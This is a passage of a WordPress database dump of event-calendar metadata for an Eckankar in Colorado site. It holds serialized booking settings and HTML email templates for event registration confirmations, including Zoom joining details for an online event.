Here\";s:19:\"private_description\";s:0:\"\";s:5:\"price\";s:1:\"0\";s:11:\"price_label\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:9:\"unlimited\";s:1:\"1\";s:14:\"minimum_ticket\";s:1:\"1\";s:18:\"stop_selling_value\";s:1:\"0\";s:17:\"stop_selling_type\";s:4:\"hour\";s:5:\"dates\";a:0:{}}}'),(177544,268025,'mec_fees_global_inheritance','1'),(177545,268025,'mec_fees','a:0:{}'),(177546,268025,'mec_ticket_variations_global_inheritance','1'),(177547,268025,'mec_ticket_variations','a:0:{}'),(177548,268025,'mec_reg_fields_global_inheritance','1'),(177549,268025,'mec_reg_fields','a:0:{}'),(177550,268025,'mec_bfixed_fields','a:0:{}'),(177551,268025,'mec_op','a:0:{}'),(177552,268025,'mec_fields','a:0:{}'),(177553,268025,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6143:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>891 2510 3432<br />\r\n<b>Passcode:</b> 162109</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09\">https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:9914:\"<!-- [if !mso]><!--><!--<![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n\r\n      <xml>\r\n        <o:OfficeDocumentSettings>\r\n          <o:AllowPNG/>\r\n          <o:PixelsPerInch>96</o:PixelsPerInch>\r\n        </o:OfficeDocumentSettings>\r\n      </xml>\r\n      <![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n  \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<style type=\"text/css\">\r\n    body {width: 600px;margin: 0 auto;}\r\n    table {border-collapse: collapse;}\r\n    table, td {mso-table-lspace: 0pt;mso-table-rspace: 0pt;}\r\n    img {-ms-interpolation-mode: bicubic;}\r\n  </style>\r\n<![endif]-->\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>\r\n<style type=\"text/css\">\r\n    body, p, div {\r\n      font-family: inherit;\r\n      font-size: 14px;\r\n    }\r\n    body {\r\n      color: #000000;\r\n    }\r\n    body a {\r\n      color: #1188E6;\r\n      text-decoration: none;\r\n    }\r\n    p { margin: 0; padding: 0; }\r\n    table.wrapper {\r\n      width:100% !important;\r\n      table-layout: fixed;\r\n      -webkit-font-smoothing: antialiased;\r\n      -webkit-text-size-adjust: 100%;\r\n      -moz-text-size-adjust: 100%;\r\n      -ms-text-size-adjust: 100%;\r\n    }\r\n    img.max-width {\r\n      max-width: 100% !important;\r\n    }\r\n    .column.of-2 {\r\n      width: 50%;\r\n    }\r\n    .column.of-3 {\r\n      width: 33.333%;\r\n    }\r\n    .column.of-4 {\r\n      width: 25%;\r\n    }\r\n    ul ul ul ul  {\r\n      list-style-type: disc !important;\r\n    }\r\n    ol ol {\r\n      list-style-type: lower-roman !important;\r\n    }\r\n    ol ol ol {\r\n      list-style-type: lower-latin !important;\r\n    }\r\n    ol ol ol ol {\r\n      list-style-type: decimal !important;\r\n    }\r\n    @media screen and (max-width:480px) {\r\n      .preheader .rightColumnContent,\r\n      .footer .rightColumnContent {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent div,\r\n      .preheader .rightColumnContent span,\r\n      .footer .rightColumnContent div,\r\n      .footer .rightColumnContent span {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent,\r\n      .preheader .leftColumnContent {\r\n        font-size: 80% !important;\r\n        padding: 5px 0;\r\n      }\r\n      table.wrapper-mobile {\r\n        width: 100% !important;\r\n        table-layout: fixed;\r\n      }\r\n      img.max-width {\r\n        height: auto !important;\r\n        max-width: 100% !important;\r\n      }\r\n      a.bulletproof-button {\r\n        display: block !important;\r\n        width: auto !important;\r\n        font-size: 80%;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n      }\r\n      .columns {\r\n        width: 100% !important;\r\n      }\r\n      .column {\r\n        display: block !important;\r\n        width: 100% !important;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n        margin-left: 0 !important;\r\n        margin-right: 0 !important;\r\n      }\r\n      .social-icon-column {\r\n        display: inline-block !important;\r\n      }\r\n    }\r\n  </style>\r\n</p>\r\n<p>\r\n<style>\r\nbody {font-family: \'Muli\', sans-serif;}\r\n</style>\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<!--user entered Head Start--><!--End Head user entered--><center class=\"wrapper\" data-link-color=\"#1188E6\" data-body-style=\"font-size:14px; font-family:inherit; color:#000000; background-color:#FFFFFF;\">\r\n<div class=\"webkit\">\r\n<table class=\"wrapper\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#FFFFFF\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"outer\" role=\"content-container\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td width=\"100%\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><!-- [if mso]>\r\n    <center>\r\n    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<table>\r\n<tr>\r\n<td width=\"600\">\r\n  <![endif]-->\r\n<table style=\"width: 100%; max-width: 600px;\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px 0px 0px 0px; color: #000000; text-align: left;\" role=\"modules-container\" align=\"left\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"module preheader preheader-hide\" style=\"display: none !important; mso-hide: all; visibility: hidden; opacity: 0; color: transparent; height: 0; width: 0;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"preheader\">\r\n<tbody>\r\n<tr>\r\n<td role=\"module-content\">\r\n<p>&nbsp;</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"padding: 30px 20px 30px 20px;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" bgcolor=\"#f6f6f6\" data-type=\"columns\" data-distribution=\"1\">\r\n<tbody>\r\n<tr role=\"module-content\">\r\n<td valign=\"top\" height=\"100%\">\r\n<table class=\"column column-0\" style=\"width: 540px; border-spacing: 0; border-collapse: collapse; margin: 0px 10px 0px 10px;\" border=\"0\" width=\"540\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\" bgcolor=\"\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px; margin: 0px; border-spacing: 0;\">\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"6c9e9414-eb30-47e2-97d8-7bd6a4df5990\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 10px 0px; line-height: 24px; text-align: inherit;\" role=\"module-content\" valign=\"top\" bgcolor=\"\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"948e3f3f-5214-4721-a90e-625a47b1c957\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 30px 18px 30px; line-height: 26px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a10dcb57-ad22-4f4d-b765-1d427dfddb4e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 30px 18px 30px; line-height: 22px; text-align: inherit; background-color: #ffffff;\" role=\"module-content\" valign=\"top\" bgcolor=\"#ffffff\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<p>&nbsp;</p>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a4e5faa9-7044-47fd-a4a1-b7a1746c258e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 18px 5px; line-height: 22px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a265ebb9-ab9c-43e8-9009-54d6151b1600\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 8px 30px 40px 28px; line-height: 22px; text-align: inherit; background-color: #6e6e6e;\" role=\"module-content\" valign=\"top\" bgcolor=\"#6e6e6e\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"></div>\r\n<figure style=\"text-align: center;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px;\">© Eckankar In Colorado -2022</span></figure>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<!-- [if mso]>\r\n                                  </td>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                                </tr>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                              </table>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                            </center>\r\n                            <![endif]--></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</center>\";}}'),(177554,268025,'mec_event_status','EventScheduled'),(177555,268025,'mec_moved_online_link',''),(177556,268025,'mec_cancelled_reason',''),(177557,268025,'mec_display_cancellation_reason_in_single_page',''),(177558,268025,'protect_children',''),(177559,268025,'passster_activate_global_protection',NULL),(177560,268025,'passster_activate_protection',NULL),(177561,268025,'passster_protection_type','password'),(177562,268025,'boldgrid_hide_page_title','0'),(177563,268025,'_thumbnail_id','266677'),(177564,268025,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(177565,268025,'boldgrid_in_page_containers','1'),(177567,268025,'_dp_original','266545'),(177568,268025,'_edit_lock','1676657258:2'),(177569,268025,'_edit_last','2'),(179835,268244,'mec_hide_end_time','0'),(179834,268244,'mec_hide_time','0'),(194910,269323,'mec_banner','a:0:{}'),(194909,269323,'mec_related_events','a:0:{}'),(194908,269323,'mec_event_gallery','a:0:{}'),(194907,269323,'mec_sequence','10'),(194906,269323,'mec_end_datetime','2023-11-26 11:30 AM'),(194905,269323,'mec_start_datetime','2023-11-26 10:30 AM'),(194904,269323,'mec_trailer_title',''),(194889,269323,'mec_moved_online_link',''),(194890,269323,'mec_cancelled_reason',''),(194891,269323,'mec_display_cancellation_reason_in_single_page',''),(194892,269323,'protect_children',''),(194893,269323,'passster_activate_global_protection',NULL),(194894,269323,'passster_activate_protection',NULL),(194895,269323,'passster_protection_type','password'),(194896,269323,'boldgrid_hide_page_title','0'),(194897,269323,'_thumbnail_id','268755'),(194911,269323,'_dp_original','266311'),(194899,269323,'boldgrid_in_page_containers','1'),(194900,269323,'passster_area_shortcode',''),(194901,269323,'mec_cost_auto_calculate','0'),(194902,269323,'mec_style_per_event','global'),(194903,269323,'mec_trailer_url',''),(194888,269323,'mec_event_status','EventScheduled'),(194887,269323,'mec_notifications','a:4:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:16:\"certificate_send\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Event Attendee Certificates\";s:7:\"content\";s:290:\"Hi %%name%%,\r\n\r\n            Congratulations for successfully attending / completing the event %%event_title%%.\r\n            Click the following link to download or print your PDF certificate.\r\n            \r\n            %%certificate_link%%\r\n\r\n            Regards,\r\n            %%blog_name%%\";}}'),(194886,269323,'mec_fields','a:0:{}'),(194876,269323,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(194885,269323,'mec_op','a:0:{}'),(194884,269323,'mec_bfixed_fields','a:0:{}'),(194883,269323,'mec_reg_fields','a:0:{}'),(194882,269323,'mec_reg_fields_global_inheritance','1'),(194881,269323,'mec_ticket_variations','a:0:{}'),(194880,269323,'mec_ticket_variations_global_inheritance','1'),(194879,269323,'mec_fees','a:0:{}'),(194878,269323,'mec_fees_global_inheritance','1'),(194877,269323,'mec_tickets','a:0:{}'),(194875,269323,'mec_hourly_schedules','a:0:{}'),(194874,269323,'mec_not_in_days',''),(194873,269323,'mec_in_days',''),(194872,269323,'mec_advanced_days','a:0:{}'),(194871,269323,'mec_repeat_end_at_date',''),(194870,269323,'mec_repeat_end_at_occurrences','9'),(192274,269121,'mec_more_info',''),(192275,269121,'mec_more_info_title',''),(192276,269121,'mec_more_info_target','_self'),(192277,269121,'mec_cost',''),(192278,269121,'mec_currency','a:0:{}'),(192279,269121,'mec_additional_organizer_ids','a:0:{}'),(192280,269121,'mec_additional_location_ids','a:0:{}'),(192281,269121,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-10-14\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-10-14\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(192282,269121,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(192283,269121,'mec_certain_weekdays','a:0:{}'),(192284,269121,'mec_allday','0'),(192285,269121,'one_occurrence','0'),(192286,269121,'mec_hide_time','0'),(192287,269121,'mec_hide_end_time','0'),(192288,269121,'mec_comment',''),(192289,269121,'mec_timezone','global'),(192290,269121,'mec_countdown_method','global'),(192291,269121,'mec_public','1'),(192292,269121,'mec_start_date','2023-10-14'),(192293,269121,'mec_start_time_hour','1'),(192294,269121,'mec_start_time_minutes','30'),(192295,269121,'mec_start_time_ampm','PM'),(192296,269121,'mec_start_day_seconds','48600'),(192297,269121,'mec_end_date','2023-10-14'),(192298,269121,'mec_end_time_hour','2'),(192299,269121,'mec_end_time_minutes','30'),(192300,269121,'mec_end_time_ampm','PM'),(192301,269121,'mec_end_day_seconds','52200'),(192302,269121,'mec_repeat_status','0'),(192303,269121,'mec_repeat_type',''),(192304,269121,'mec_repeat_interval','1'),(192305,269121,'mec_repeat_end',''),(192306,269121,'mec_repeat_end_at_occurrences','9'),(192307,269121,'mec_repeat_end_at_date',''),(192308,269121,'mec_advanced_days','a:0:{}'),(192309,269121,'mec_in_days',''),(192310,269121,'mec_not_in_days',''),(192311,269121,'mec_hourly_schedules','a:0:{}'),(192312,269121,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(192313,269121,'mec_tickets','a:0:{}'),(192314,269121,'mec_fees_global_inheritance','1'),(192315,269121,'mec_fees','a:0:{}'),(192316,269121,'mec_ticket_variations_global_inheritance','1'),(192317,269121,'mec_ticket_variations','a:0:{}'),(192318,269121,'mec_reg_fields_global_inheritance','1'),(192319,269121,'mec_reg_fields','a:0:{}'),(192320,269121,'mec_bfixed_fields','a:0:{}'),(192321,269121,'mec_op','a:0:{}'),(192322,269121,'mec_fields','a:0:{}'),(192323,269121,'mec_event_status','EventScheduled'),(192324,269121,'mec_moved_online_link',''),(192325,269121,'mec_cancelled_reason',''),(192326,269121,'mec_display_cancellation_reason_in_single_page',''),(192327,269121,'boldgrid_hide_page_title','0'),(192328,269121,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br 